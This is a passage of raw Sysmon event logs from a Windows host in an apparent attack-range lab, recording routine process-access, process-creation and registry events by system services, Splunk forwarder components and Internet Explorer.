13:36:19.956{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-48D3-6000-6805-000000009A01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.956{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-48D3-6000-6805-000000009A01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:19.957{08A6967A-48D3-6000-6805-000000009A01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:33.299{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:42.330{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:42.330{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:42.330{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:42.330{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:45.190{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:47.268{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:47.268{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:47.268{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:36:52.158{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:00.127{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:00.127{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:00.127{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:00.127{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x800000000000000013742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x800000000000000013741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x800000000000000013740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d6ea7a-0x5e1cca45) 13241300x800000000000000013739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x800000000000000013738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:37:13.986{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 10341000x800000000000000013737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:13.376{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490B-6000-6A05-000000009A01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-490B-6000-6A05-000000009A01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.876{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490B-6000-6A05-000000009A01}1208C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:15.877{08A6967A-490B-6000-6A05-000000009A01}1208C:\Program 